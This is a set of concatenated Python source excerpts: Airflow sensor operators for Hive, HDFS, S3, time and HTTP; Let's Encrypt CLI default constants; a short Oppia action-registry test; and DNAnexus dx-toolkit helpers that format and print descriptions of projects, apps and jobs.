        session.commit()
        session.close()
        return count


class NamedHivePartitionSensor(BaseSensorOperator):
    """
    Waits for a set of partitions to show up in Hive.

    :param partition_names: List of fully qualified names of the
        partitions to wait for. A fully qualified name is of the
        form schema.table/pk1=pv1/pk2=pv2, for example,
        default.users/ds=2016-01-01. This is passed as is to the metastore
        Thrift client "get_partitions_by_name" method. Note that
        you cannot use logical operators as in HivePartitionSensor.
    :type partition_names: list of strings
    :param metastore_conn_id: reference to the metastore thrift service
        connection id
    :type metastore_conn_id: str
    """

    template_fields = ('partition_names', )

    @apply_defaults
    def __init__(
            self,
            partition_names,
            metastore_conn_id='metastore_default',
            poke_interval=60*3,
            *args,
            **kwargs):
        super(NamedHivePartitionSensor, self).__init__(
            poke_interval=poke_interval, *args, **kwargs)

        if isinstance(partition_names, basestring):
            raise TypeError('partition_names must be an array of strings')

        self.metastore_conn_id = metastore_conn_id
        self.partition_names = partition_names
        self.next_poke_idx = 0

    def parse_partition_name(self, partition):
        try:
            schema, table_partition = partition.split('.')
            table, partition = table_partition.split('/', 1)
            return schema, table, partition
        except ValueError as e:
            raise ValueError('Could not parse ' + partition)

    def poke(self, context):

        if not hasattr(self, 'hook'):
            self.hook = airflow.hooks.hive_hooks.HiveMetastoreHook(
                metastore_conn_id=self.metastore_conn_id)

        def poke_partition(partition):

            schema, table, partition = self.parse_partition_name(partition)

            logging.info(
                'Poking for {schema}.{table}/{partition}'.format(**locals())
            )
            return self.hook.check_for_named_partition(
                schema, table, partition)

        while self.next_poke_idx < len(self.partition_names):
            if poke_partition(self.partition_names[self.next_poke_idx]):
                self.next_poke_idx += 1
            else:
                return False

        return True


class HivePartitionSensor(BaseSensorOperator):
    """
    Waits for a partition to show up in Hive.

    Note: Because @partition supports general logical operators, it
    can be inefficient. Consider using NamedHivePartitionSensor instead if
    you don't need the full flexibility of HivePartitionSensor.

    :param table: The name of the table to wait for, supports the dot
        notation (my_database.my_table)
    :type table: string
    :param partition: The partition clause to wait for. This is passed as
        is to the metastore Thrift client "get_partitions_by_filter" method,
        and apparently supports SQL like notation as in `ds='2015-01-01'
        AND type='value'` and > < sings as in "ds>=2015-01-01"
    :type partition: string
    :param metastore_conn_id: reference to the metastore thrift service
        connection id
    :type metastore_conn_id: str
    """
    template_fields = ('schema', 'table', 'partition',)

    @apply_defaults
    def __init__(
            self,
            table, partition="ds='{{ ds }}'",
            metastore_conn_id='metastore_default',
            schema='default',
            poke_interval=60*3,
            *args, **kwargs):
        super(HivePartitionSensor, self).__init__(
            poke_interval=poke_interval, *args, **kwargs)
        if not partition:
            partition = "ds='{{ ds }}'"
        self.metastore_conn_id = metastore_conn_id
        self.table = table
        self.partition = partition
        self.schema = schema

    def poke(self, context):
        if '.' in self.table:
            self.schema, self.table = self.table.split('.')
        logging.info(
            'Poking for table {self.schema}.{self.table}, '
            'partition {self.partition}'.format(**locals()))
        if not hasattr(self, 'hook'):
            self.hook = airflow.hooks.hive_hooks.HiveMetastoreHook(
                metastore_conn_id=self.metastore_conn_id)
        return self.hook.check_for_partition(
            self.schema, self.table, self.partition)


class HdfsSensor(BaseSensorOperator):
    """
    Waits for a file or folder to land in HDFS
    """
    template_fields = ('filepath',)

    @apply_defaults
    def __init__(
            self,
            filepath,
            hdfs_conn_id='hdfs_default',
            *args, **kwargs):
        super(HdfsSensor, self).__init__(*args, **kwargs)
        self.filepath = filepath
        self.hdfs_conn_id = hdfs_conn_id

    def poke(self, context):
        import airflow.hooks.hdfs_hook
        sb = airflow.hooks.hdfs_hook.HDFSHook(self.hdfs_conn_id).get_conn()
        logging.getLogger("snakebite").setLevel(logging.WARNING)
        logging.info(
            'Poking for file {self.filepath} '.format(**locals()))
        try:
            files = [f for f in sb.ls([self.filepath])]
        except:
            return False
        return True


class WebHdfsSensor(BaseSensorOperator):
    """
    Waits for a file or folder to land in HDFS
    """
    template_fields = ('filepath',)

    @apply_defaults
    def __init__(
            self,
            filepath,
            webhdfs_conn_id='webhdfs_default',
            *args, **kwargs):
        super(WebHdfsSensor, self).__init__(*args, **kwargs)
        self.filepath = filepath
        self.webhdfs_conn_id = webhdfs_conn_id

    def poke(self, context):
        c = airflow.hooks.webhdfs_hook.WebHDFSHook(self.webhdfs_conn_id)
        logging.info(
            'Poking for file {self.filepath} '.format(**locals()))
        return c.check_for_path(hdfs_path=self.filepath)


class S3KeySensor(BaseSensorOperator):
    """
    Waits for a key (a file-like instance on S3) to be present in a S3 bucket.
    S3 being a key/value it does not support folders. The path is just a key
    a resource.

    :param bucket_key: The key being waited on. Supports full s3:// style url
        or relative path from root level.
    :type bucket_key: str
    :param bucket_name: Name of the S3 bucket
    :type bucket_name: str
    :param wildcard_match: whether the bucket_key should be interpreted as a
        Unix wildcard pattern
    :type wildcard_match: bool
    :param s3_conn_id: a reference to the s3 connection
    :type s3_conn_id: str
    """
    template_fields = ('bucket_key', 'bucket_name')

    @apply_defaults
    def __init__(
            self, bucket_key,
            bucket_name=None,
            wildcard_match=False,
            s3_conn_id='s3_default',
            *args, **kwargs):
        super(S3KeySensor, self).__init__(*args, **kwargs)
        session = settings.Session()
        db = session.query(DB).filter(DB.conn_id == s3_conn_id).first()
        if not db:
            raise AirflowException("conn_id doesn't exist in the repository")
        # Parse
        if bucket_name is None:
            parsed_url = urlparse(bucket_key)
            if parsed_url.netloc == '':
                raise AirflowException('Please provide a bucket_name')
            else:
                bucket_name = parsed_url.netloc
                if parsed_url.path[0] == '/':
                    bucket_key = parsed_url.path[1:]
                else:
                    bucket_key = parsed_url.path
        self.bucket_name = bucket_name
        self.bucket_key = bucket_key
        self.wildcard_match = wildcard_match
        self.s3_conn_id = s3_conn_id
        session.commit()
        session.close()

    def poke(self, context):
        import airflow.hooks.S3_hook
        hook = airflow.hooks.S3_hook.S3Hook(s3_conn_id=self.s3_conn_id)
        full_url = "s3://" + self.bucket_name + "/" + self.bucket_key
        logging.info('Poking for key : {full_url}'.format(**locals()))
        if self.wildcard_match:
            return hook.check_for_wildcard_key(self.bucket_key,
                                               self.bucket_name)
        else:
            return hook.check_for_key(self.bucket_key, self.bucket_name)


class S3PrefixSensor(BaseSensorOperator):
    """
    Waits for a prefix to exist. A prefix is the first part of a key,
    thus enabling checking of constructs similar to glob airfl* or
    SQL LIKE 'airfl%'. There is the possibility to precise a delimiter to
    indicate the hierarchy or keys, meaning that the match will stop at that
    delimiter. Current code accepts sane delimiters, i.e. characters that
    are NOT special characters in the Python regex engine.

    :param bucket_name: Name of the S3 bucket
    :type bucket_name: str
    :param prefix: The prefix being waited on. Relative path from bucket root level.
    :type prefix: str
    :param delimiter: The delimiter intended to show hierarchy.
        Defaults to '/'.
    :type delimiter: str
    """
    template_fields = ('prefix', 'bucket_name')

    @apply_defaults
    def __init__(
            self, bucket_name,
            prefix, delimiter='/',
            s3_conn_id='s3_default',
            *args, **kwargs):
        super(S3PrefixSensor, self).__init__(*args, **kwargs)
        session = settings.Session()
        db = session.query(DB).filter(DB.conn_id == s3_conn_id).first()
        if not db:
            raise AirflowException("conn_id doesn't exist in the repository")
        # Parse
        self.bucket_name = bucket_name
        self.prefix = prefix
        self.delimiter = delimiter
        self.full_url = "s3://" + bucket_name + '/' + prefix
        self.s3_conn_id = s3_conn_id
        session.commit()
        session.close()

    def poke(self, context):
        logging.info('Poking for prefix : {self.prefix}\n'
                     'in bucket s3://{self.bucket_name}'.format(**locals()))
        import airflow.hooks.S3_hook
        hook = airflow.hooks.S3_hook.S3Hook(s3_conn_id=self.s3_conn_id)
        return hook.check_for_prefix(
            prefix=self.prefix,
            delimiter=self.delimiter,
            bucket_name=self.bucket_name)


class TimeSensor(BaseSensorOperator):
    """
    Waits until the specified time of the day.

    :param target_time: time after which the job succeeds
    :type target_time: datetime.time
    """
    template_fields = tuple()

    @apply_defaults
    def __init__(self, target_time, *args, **kwargs):
        super(TimeSensor, self).__init__(*args, **kwargs)
        self.target_time = target_time

    def poke(self, context):
        logging.info(
            'Checking if the time ({0}) has come'.format(self.target_time))
        return datetime.now().time() > self.target_time


class TimeDeltaSensor(BaseSensorOperator):
    """
    Waits for a timedelta after the task's execution_date + schedule_interval.
    In Airflow, the daily task stamped with ``execution_date``
    2016-01-01 can only start running on 2016-01-02. The timedelta here
    represents the time after the execution period has closed.

    :param delta: time length to wait after execution_date before succeeding
    :type delta: datetime.timedelta
    """
    template_fields = tuple()

    @apply_defaults
    def __init__(self, delta, *args, **kwargs):
        super(TimeDeltaSensor, self).__init__(*args, **kwargs)
        self.delta = delta

    def poke(self, context):
        dag = context['dag']
        target_dttm = dag.following_schedule(context['execution_date'])
        target_dttm += self.delta
        logging.info('Checking if the time ({0}) has come'.format(target_dttm))
        return datetime.now() > target_dttm


class HttpSensor(BaseSensorOperator):
    """
    Executes a HTTP get statement and returns False on failure:
        404 not found or response_check function returned False

    :param http_conn_id: The connection to run the sensor against
    :type http_conn_id: string
    :param endpoint: The relative part of the full url
    :type endpoint: string
    :param params: The parameters to be added to the GET url
    :type params: a dictionary of string key/value pairs
    :param headers: The HTTP headers to be added to the GET request
    :type headers: a dictionary of string key/value pairs
    :param response_check: A check against the 'requests' response object.
        Returns True for 'pass' and False otherwise.
    :type response_check: A lambda or defined function.
    :param extra_options: Extra options for the 'requests' library, see the
        'requests' documentation (options to modify timeout, ssl, etc.)
    :type extra_options: A dictionary of options, where key is string and value
        depends on the option that's being modified.
    """

    template_fields = ('endpoint',)

    @apply_defaults
    def __init__(self,
                 endpoint,
                 http_conn_id='http_default',
                 params=None,
                 headers=None,
                 response_check=None,
                 extra_options=None, *args, **kwargs):
        super(HttpSensor, self).__init__(*args, **kwargs)
        self.endpoint = endpoint
        self.http_conn_id = http_conn_id
        self.params = params or {}
        self.headers = headers or {}
        self.extra_options = extra_options or {}
        self.response_check = response_check

        self.hook = hooks.http_hook.HttpHook(method='GET', http_conn_id=http_conn_id)

    def poke(self, context):
        logging.info('Poking: ' + self.endpoint)
        try:
            response = self.hook.run(self.endpoint,
                                     data=self.params,
                                     headers=self.headers,
                                     extra_options=self.extra_options)
            if self.response_check:
                # run content check on response
                return self.response_check(response)
        except AirflowException as ae:
            if str(ae).startswith("404"):
                return False

            raise ae

        return True

"""Let's Encrypt constants."""
import logging

from acme import challenges


SETUPTOOLS_PLUGINS_ENTRY_POINT = "letsencrypt.plugins"
"""Setuptools entry point group name for plugins."""


CLI_DEFAULTS = dict(
    config_files=["/etc/letsencrypt/cli.ini"],
    verbose_count=-(logging.WARNING / 10),
    server="https://www.letsencrypt-demo.org/acme/new-reg",
    rsa_key_size=2048,
    rollback_checkpoints=0,
    config_dir="/etc/letsencrypt",
    work_dir="/var/lib/letsencrypt",
    backup_dir="/var/lib/letsencrypt/backups",
    key_dir="/etc/letsencrypt/keys",
    certs_dir="/etc/letsencrypt/certs",
    cert_path="/etc/letsencrypt/certs/cert-letsencrypt.pem",
    chain_path="/etc/letsencrypt/certs/chain-letsencrypt.pem",
    renewer_config_file="/etc/letsencrypt/renewer.conf",
    no_verify_ssl=False,
    dvsni_port=challenges.DVSNI.PORT,
)
"""Defaults for CLI flags and `.IConfig` attributes."""


RENEWER_DEFAULTS = dict(
    renewer_config_file="/etc/letsencrypt/renewer.conf",
    renewal_configs_dir="/etc/letsencrypt/configs",
    archive_dir="/etc/letsencrypt/archive",
    live_dir="/etc/letsencrypt/live",
    renewer_enabled="yes",
    renew_before_expiry="30 days",
    deploy_before_expiry="20 days",
)
"""Defaults for renewer script."""


EXCLUSIVE_CHALLENGES = frozenset([frozenset([
    challenges.DVSNI, challenges.SimpleHTTP])])
"""Mutually exclusive challenges."""


ENHANCEMENTS = ["redirect", "http-header", "ocsp-stapling", "spdy"]
"""List of possible :class:`letsencrypt.interfaces.IInstaller`
enhancements.

List of expected options parameters:
- redirect: None
- http-header: TODO
- ocsp-stapling: TODO
- spdy: TODO

"""


CONFIG_DIRS_MODE = 0o755
"""Directory mode for ``.IConfig.config_dir`` et al."""

TEMP_CHECKPOINT_DIR = "temp_checkpoint"
"""Temporary checkpoint directory (relative to IConfig.work_dir)."""

IN_PROGRESS_DIR = "IN_PROGRESS"
"""Directory used before a permanent checkpoint is finalized (relative to
IConfig.work_dir)."""

CERT_KEY_BACKUP_DIR = "keys-certs"
"""Directory where all certificates and keys are stored (relative to
IConfig.work_dir. Used for easy revocation."""

ACCOUNTS_DIR = "accounts"
"""Directory where all accounts are saved."""

ACCOUNT_KEYS_DIR = "keys"
"""Directory where account keys are saved. Relative to ACCOUNTS_DIR."""

REC_TOKEN_DIR = "recovery_tokens"
"""Directory where all recovery tokens are saved (relative to
IConfig.work_dir)."""

# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Tests for methods in the action registry."""

from __future__ import absolute_import  # pylint: disable=import-only-modules
from __future__ import unicode_literals  # pylint: disable=import-only-modules

from core.domain import action_registry
from core.tests import test_utils


class ActionRegistryUnitTests(test_utils.GenericTestBase):
    """Test for the action registry."""

    def test_action_registry(self):
        """Do some sanity checks on the action registry."""
        self.assertEqual(
            len(action_registry.Registry.get_all_actions()), 3)

# -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2016 DNAnexus, Inc.
#
# This file is part of dx-toolkit (DNAnexus platform client libraries).
#
#   Licensed under the Apache License, Version 2.0 (the "License"); you may not
#   use this file except in compliance with the License. You may obtain a copy
#   of the License at
#
#       http://www.apache.org/licenses/LICENSE-2.0
#
#   Unless required by applicable law or agreed to in writing, software
#   distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#   WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#   License for the specific language governing permissions and limitations
#   under the License.

'''
This submodule contains helper functions for parsing and printing the
contents of describe hashes for various DNAnexus entities (projects,
containers, dataobjects, apps, and jobs).
'''

from __future__ import print_function, unicode_literals, division, absolute_import

import datetime, time, json, math, sys, copy
import locale
import subprocess
from collections import defaultdict

import dxpy
from .printing import (RED, GREEN, BLUE, YELLOW, WHITE, BOLD, UNDERLINE, ENDC, DELIMITER, get_delimiter, fill)
from ..compat import basestring, USING_PYTHON2

def JOB_STATES(state):
    if state == 'failed':
        return BOLD() + RED() + state + ENDC()
    elif state == 'done':
        return BOLD() + GREEN() + state + ENDC()
    elif state in ['running', 'in_progress']:
        return GREEN() + state + ENDC()
    elif state == 'partially_failed':
        return RED() + state + ENDC()
    else:
        return YELLOW() + state + ENDC()

def DATA_STATES(state):
    if state == 'open':
        return YELLOW() + state + ENDC()
    elif state == 'closing':
        return YELLOW() + state + ENDC()
    elif state == 'closed':
        return GREEN() + state + ENDC()
    else:
        return state

SIZE_LEVEL = ['bytes', 'KB', 'MB', 'GB', 'TB']


def get_size_str(size):
    """
    Formats a byte size as a string.

    The returned string is no more than 9 characters long.
    """
    if size is None:
        return "0 " + SIZE_LEVEL[0]
    if size == 0:
        magnitude = 0
        level = 0
    else:
        magnitude = math.floor(math.log(size, 10))
        level = int(min(math.floor(magnitude // 3), 4))
    return ('%d' if level == 0 else '%.2f') % (float(size) / 2**(level*10)) + ' ' + SIZE_LEVEL[level]


def parse_typespec(thing):
    if isinstance(thing, basestring):
        return thing
    elif '$and' in thing:
        return '(' + ' AND '.join(map(parse_typespec, thing['$and'])) + ')'
    elif '$or' in thing:
        return '(' + ' OR '.join(map(parse_typespec, thing['$or'])) + ')'
    else:
        return 'Type spec could not be parsed'

def get_io_desc(parameter, include_class=True, show_opt=True, app_help_version=False):
    # For interactive help, format array:CLASS inputs as:
    #   -iNAME=CLASS [-iNAME=... [...]]   # If input is required (needs >=1 inputs)
    #   [-iNAME=CLASS [...]]              # If input is optional (needs >=0 inputs
    if app_help_version and parameter["class"].startswith("array"):
        scalar_parameter = parameter.copy()
        # Munge the parameter dict (strip off "array:" to turn it into a
        # scalar) and recurse
        scalar_parameter["class"] = scalar_parameter["class"][6:]
        if "default" in parameter or parameter.get("optional"):
            return "[" + get_io_desc(scalar_parameter, include_class=include_class, show_opt=False, app_help_version=app_help_version) + " [-i%s=... [...]]]" % (parameter["name"],)
        else:
            return get_io_desc(scalar_parameter, include_class=include_class, show_opt=False, app_help_version=app_help_version) + " [-i%s=... [...]]" % (parameter["name"],)

    desc = ""
    is_optional = False
    if show_opt:
        if "default" in parameter or parameter.get("optional"):
            is_optional = True
            desc += "["
    desc += ('-i' if app_help_version else '') + parameter["name"]
    include_parens = include_class or 'type' in parameter or 'default' in parameter
    if include_parens:
        desc += ("=" if app_help_version else " ") + "("
    is_first = True
    if include_class:
        desc += parameter["class"]
        is_first = False
    if "type" in parameter:
        if not is_first:
            desc += ", "
        else:
            is_first = False
        desc += "type " + parse_typespec(parameter["type"])
    if "default" in parameter:
        if not is_first:
            desc += ', '
        desc += 'default=' + json.dumps(parameter['default'])
    if include_parens:
        desc += ")"
    if show_opt and is_optional:
        desc += "]"
    return desc

def get_io_spec(spec, skip_fields=None):
    if spec is None:
        return 'null'
    if skip_fields is None:
        skip_fields = []
    filtered_spec = [param for param in spec if param["name"] not in skip_fields]
    groups = defaultdict(list)
    for param in filtered_spec:
        groups[param.get('group')].append(param)

    list_of_params = []
    for param in groups.get(None, []):
        list_of_params.append(get_io_desc(param))
    for group in groups:
        if group is None:
            continue
        list_of_params.append("{g}:".format(g=group))
        for param in groups[group]:
            list_of_params.append("    "+get_io_desc(param))

    if len(skip_fields) > 0:
        list_of_params.append("<advanced inputs hidden; use --verbose to see more>")

    if len(list_of_params) == 0:
        return '-'
    if get_delimiter() is not None:
        return ('\n' + get_delimiter()).join(list_of_params)
    else:
        return ('\n' + ' '*16).join([fill(param,
                                          subsequent_indent=' '*18,
                                          width_adjustment=-18) for param in list_of_params])

def is_job_ref(thing, reftype=dict):
    '''
    :param thing: something that might be a job-based object reference hash
    :param reftype: type that a job-based object reference would be (default is dict)
    '''
    return isinstance(thing, reftype) and \
        ((len(thing) == 2 and \
              isinstance(thing.get('field'), basestring) and \
              isinstance(thing.get('job'), basestring)) or \
             (len(thing) == 1 and \
                  isinstance(thing.get('$dnanexus_link'), reftype) and \
                  isinstance(thing['$dnanexus_link'].get('field'), basestring) and \
                  isinstance(thing['$dnanexus_link'].get('job'), basestring)))

def get_job_from_jbor(thing):
    '''
    :returns: Job ID from a JBOR

    Assumes :func:`is_job_ref` evaluates to True
    '''
    if '$dnanexus_link' in thing:
        return thing['$dnanexus_link']['job']
    else:
        return thing['job']

def get_field_from_jbor(thing):
    '''
    :returns: Output field name from a JBOR

    Assumes :func:`is_job_ref` evaluates to True
    '''
    if '$dnanexus_link' in thing:
        return thing['$dnanexus_link']['field']
    else:
        return thing['field']

def get_index_from_jbor(thing):
    '''
    :returns: Array index of the JBOR if applicable; None otherwise

    Assumes :func:`is_job_ref` evaluates to True
    '''
    if '$dnanexus_link' in thing:
        return thing['$dnanexus_link'].get('index')
    else:
        return None

def is_metadata_ref(thing, reftype=dict):
    return isinstance(thing, reftype) and \
        len(thing) == 1 and \
        isinstance(thing.get('$dnanexus_link'), reftype) and \
        isinstance(thing['$dnanexus_link'].get('metadata'), basestring)

def jbor_to_str(val):
    ans = get_job_from_jbor(val) + ':' + get_field_from_jbor(val)
    index = get_index_from_jbor(val)
    if index is not None:
        ans += "." + str(index)
    return ans

def io_val_to_str(val):
    if is_job_ref(val):
        # Job-based object references
        return jbor_to_str(val)
    elif isinstance(val, dict) and '$dnanexus_link' in val:
        # DNAnexus link
        if isinstance(val['$dnanexus_link'], basestring):
            # simple link
            return val['$dnanexus_link']
        elif 'project' in val['$dnanexus_link'] and 'id' in val['$dnanexus_link']:
            return val['$dnanexus_link']['project'] + ':' + val['$dnanexus_link']['id']
        else:
            return json.dumps(val)
    elif isinstance(val, list):
        if len(val) == 0:
            return '[]'
        else:
            return '[ ' + ', '.join([io_val_to_str(item) for item in val]) + ' ]'
    elif isinstance(val, dict):
        return '{ ' + ', '.join([key + ': ' + io_val_to_str(value) for key, value in val.items()]) + ' }'
    else:
        return json.dumps(val)

def job_output_to_str(job_output, prefix='\n', title="Output: ", title_len=None):
    if len(job_output) == 0:
        return prefix + title + "-"
    else:
        if title_len is None:
            title_len = len(title)
        return prefix + title + (prefix+' '*title_len).join([fill(key + ' = ' + io_val_to_str(value),
                                                                   subsequent_indent=' '*9,
                                                                   break_long_words=False) for key, value in job_output.items()])


def get_io_field(io_hash, defaults=None, delim='=', highlight_fields=()):

    def highlight_value(key, value):
        if key in highlight_fields:
            return YELLOW() + value + ENDC()
        else:
            return value

    if defaults is None:
        defaults = {}
    if io_hash is None:
        return '-'
    if len(io_hash) == 0 and len(defaults) == 0:
        return '-'
    if get_delimiter() is not None:
        return ('\n' + get_delimiter()).join([(key + delim + highlight_value(key, io_val_to_str(value))) for key, value in io_hash.items()] +
                                             [('[' + key + delim + io_val_to_str(value) + ']') for key, value in defaults.items()])
    else:
        lines = [fill(key + ' ' + delim + ' ' + highlight_value(key, io_val_to_str(value)),
                      initial_indent=' ' * FIELD_NAME_WIDTH,
                      subsequent_indent=' ' * (FIELD_NAME_WIDTH + 1),
                      break_long_words=False)
                 for key, value in io_hash.items()]
        lines.extend([fill('[' + key + ' ' + delim + ' ' + io_val_to_str(value) + ']',
                           initial_indent=' ' * FIELD_NAME_WIDTH,
                           subsequent_indent=' ' * (FIELD_NAME_WIDTH + 1),
                           break_long_words=False)
                      for key, value in defaults.items()])
        return '\n'.join(lines)[FIELD_NAME_WIDTH:]

def get_resolved_jbors(resolved_thing, orig_thing, resolved_jbors):
    if resolved_thing == orig_thing:
        return
    if is_job_ref(orig_thing):
        jbor_str = jbor_to_str(orig_thing)
        if jbor_str not in resolved_jbors:
            try:
                from dxpy.api import job_describe
                job_output = job_describe(get_job_from_jbor(orig_thing)).get('output')
                if job_output is not None:
                    field_value = job_output.get(get_field_from_jbor(orig_thing))
                    jbor_index = get_index_from_jbor(orig_thing)
                    if jbor_index is not None:
                        if isinstance(field_value, list):
                            resolved_jbors[jbor_str] = field_value[jbor_index]
                    else:
                        resolved_jbors[jbor_str] = field_value
            except:
                # Just don't report any resolved JBORs if there are
                # any problems
                pass
    elif isinstance(orig_thing, list):
        for i in range(len(orig_thing)):
            get_resolved_jbors(resolved_thing[i], orig_thing[i], resolved_jbors)
    elif isinstance(orig_thing, dict) and '$dnanexus_link' not in orig_thing:
        for key in orig_thing:
            get_resolved_jbors(resolved_thing[key], orig_thing[key], resolved_jbors)

def render_bundleddepends(thing):
    from ..bindings.search import find_one_data_object
    from ..exceptions import DXError
    bundles = []
    for item in thing:
        bundle_asset_record = dxpy.DXFile(item["id"]["$dnanexus_link"]).get_properties().get("AssetBundle")
        asset = None

        if bundle_asset_record:
            asset = dxpy.DXRecord(bundle_asset_record)

        if asset:
            try:
                bundles.append(asset.describe().get("name") + " (" + asset.get_id() + ")")
            except DXError:
                asset = None

        if not asset:
            bundles.append(item["name"] + " (" + item["id"]["$dnanexus_link"] + ")")

    return bundles

def render_execdepends(thing):
    rendered = []
    for item in thing:
        dep = copy.copy(item)
        dep.setdefault('package_manager', 'apt')
        dep['version'] = ' = '+dep['version'] if 'version' in dep else ''
        rendered.append("{package_manager}: {name}{version}".format(**dep))
    return rendered

def render_stage(title, stage, as_stage_of=None):
    lines_to_print = []

    if stage['name'] is not None:
        lines_to_print.append((title, "{name} ({id})".format(name=stage['name'], id=stage['id'])))
    else:
        lines_to_print.append((title, stage['id']))

    lines_to_print.append(('  Executable', stage['executable'] + \
                           (" (" + RED() + "inaccessible" + ENDC() + ")" \
                            if stage.get('accessible') is False else "")))

    if 'execution' in stage:
        is_cached_result = as_stage_of is not None and 'parentAnalysis' in stage['execution'] and \
                           stage['execution']['parentAnalysis'] != as_stage_of
        execution_id_str = stage['execution']['id']
        if is_cached_result:
            execution_id_str = "[" + execution_id_str + "]"

        if 'state' in stage['execution']:
            lines_to_print.append(('  Execution', execution_id_str + ' (' + JOB_STATES(stage['execution']['state']) + ')'))
        else:
            lines_to_print.append(('  Execution', execution_id_str))

        if is_cached_result:
            lines_to_print.append(('  Cached from', stage['execution']['parentAnalysis']))

    for line in lines_to_print:
        print_field(line[0], line[1])

def render_short_timestamp(timestamp):
    return str(datetime.datetime.fromtimestamp(timestamp//1000))

def render_timestamp(timestamp):
    return datetime.datetime.fromtimestamp(timestamp//1000).ctime()


FIELD_NAME_WIDTH = 22


def print_field(label, value):
    if get_delimiter() is not None:
        sys.stdout.write(label + get_delimiter() + value + '\n')
    else:
        sys.stdout.write(
            label + " " * (FIELD_NAME_WIDTH-len(label)) + fill(value,
                                                               subsequent_indent=' '*FIELD_NAME_WIDTH,
                                                               width_adjustment=-FIELD_NAME_WIDTH) +
            '\n')


def print_nofill_field(label, value):
    sys.stdout.write(label + DELIMITER(" " * (FIELD_NAME_WIDTH - len(label))) + value + '\n')


def print_list_field(label, values):
    print_field(label, ('-' if len(values) == 0 else DELIMITER(', ').join(values)))

def print_json_field(label, json_value):
    print_field(label, json.dumps(json_value, ensure_ascii=False))


def print_project_desc(desc, verbose=False):
    recognized_fields = [
        'id', 'class', 'name', 'summary', 'description', 'protected', 'restricted', 'created', 'modified',
        'dataUsage', 'sponsoredDataUsage', 'tags', 'level', 'folders', 'objects', 'permissions', 'properties',
        'appCaches', 'billTo', 'version', 'createdBy', 'totalSponsoredEgressBytes', 'consumedSponsoredEgressBytes',
        'containsPHI', 'databaseUIViewOnly', 'region', 'storageCost', 'pendingTransfer','atSpendingLimit',
        # Following are app container-specific
        'destroyAt', 'project', 'type', 'app', 'appName'
    ]

    # Basic metadata
    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if "name" in desc:
        print_field("Name", desc["name"])
    if 'summary' in desc:
        print_field("Summary", desc["summary"])
    if 'description' in desc and (verbose or 'summary' not in desc):
        print_field("Description", desc['description'])
    if 'version' in desc and verbose:
        print_field("Version", str(desc['version']))

    # Ownership and permissions
    if 'billTo' in desc:
        print_field("Billed to",  desc['billTo'][5 if desc['billTo'].startswith('user-') else 0:])
    if 'pendingTransfer' in desc and (verbose or desc['pendingTransfer'] is not None):
        print_json_field('Pending transfer to', desc['pendingTransfer'])
    if "level" in desc:
        print_field("Access level", desc["level"])
    if 'region' in desc:
        print_field('Region', desc['region'])

    # Project settings
    if 'protected' in desc:
        print_json_field("Protected", desc["protected"])
    if 'restricted' in desc:
        print_json_field("Restricted", desc["restricted"])
    if 'containsPHI' in desc:
        print_json_field('Contains PHI', desc['containsPHI'])
    if 'databaseUIViewOnly' in desc and desc['databaseUIViewOnly']:
        print_json_field('Database UI View Only', desc['databaseUIViewOnly'])

    # Usage
    print_field("Created", render_timestamp(desc['created']))
    if 'createdBy' in desc:
        print_field("Created by", desc['createdBy']['user'][desc['createdBy']['user'].find('-') + 1:])
    print_field("Last modified", render_timestamp(desc['modified']))
    print_field("Data usage", ('%.2f' % desc["dataUsage"]) + ' GB')
    if 'sponsoredDataUsage' in desc:
        print_field("Sponsored data", ('%.2f' % desc["sponsoredDataUsage"]) + ' GB')
    if 'storageCost' in desc:
        print_field("Storage cost", "$%.3f/month" % desc["storageCost"])
    if 'totalSponsoredEgressBytes' in desc or 'consumedSponsoredEgressBytes' in desc:
        total_egress_str = '%.2f GB' % (desc['totalSponsoredEgressBytes'] / 1073741824.,) \
                           if 'totalSponsoredEgressBytes' in desc else '??'
        consumed_egress_str = '%.2f GB' % (desc['consumedSponsoredEgressBytes'] / 1073741824.,) \
                              if 'consumedSponsoredEgressBytes' in desc else '??'
        print_field('Sponsored egress',
                    ('%s used of %s total' % (consumed_egress_str, total_egress_str)))
    if 'atSpendingLimit' in desc:
        print_json_field("At spending limit?", desc['atSpendingLimit'])

    # Misc metadata
    if "objects" in desc:
        print_field("# Files", str(desc["objects"]))
    if "folders" in desc:
        print_list_field("Folders", desc["folders"])
    if "permissions" in desc:
        print_list_field(
            "Permissions",
            [key[5 if key.startswith('user-') else 0:] + ':' + value for key, value in desc["permissions"].items()]
        )
    if 'tags' in desc:
        print_list_field("Tags", desc["tags"])
    if "properties" in desc:
        print_list_field("Properties", [key + '=' + value for key, value in desc["properties"].items()])

    if "appCaches" in desc:
        print_json_field("App caches", desc["appCaches"])

    # Container-specific
    if 'type' in desc:
        print_field("Container type", desc["type"])
    if 'project' in desc:
        print_field("Associated project", desc["project"])
    if 'destroyAt' in desc:
        print_field("To be destroyed", render_timestamp(desc['modified']))
    if 'app' in desc:
        print_field("Associated App ID", desc["app"])
    if 'appName' in desc:
        print_field("Associated App", desc["appName"])

    for field in desc:
        if field not in recognized_fields:
            print_json_field(field, desc[field])

def get_advanced_inputs(desc, verbose):
    details = desc.get("details")
    if not verbose and isinstance(details, dict):
        return details.get("advancedInputs", [])
    return []

def print_app_desc(desc, verbose=False):
    recognized_fields = ['id', 'class', 'name', 'version', 'aliases', 'createdBy', 'created', 'modified', 'deleted', 'published', 'title', 'subtitle', 'description', 'categories', 'access', 'dxapi', 'inputSpec', 'outputSpec', 'runSpec', 'resources', 'billTo', 'installed', 'openSource', 'summary', 'applet', 'installs', 'billing', 'details', 'developerNotes',
                         'authorizedUsers']
    print_field("ID", desc["id"])
    print_field("Class", desc["class"])
    if 'billTo' in desc:
        print_field("Billed to", desc['billTo'][5 if desc['billTo'].startswith('user-') else 0:])
    print_field("Name", desc["name"])
    print_field("Version", desc["version"])
    print_list_field("Aliases", desc["aliases"])
    print_field("Created by", desc["createdBy"][5 if desc['createdBy'].startswith('user-') else 0:])
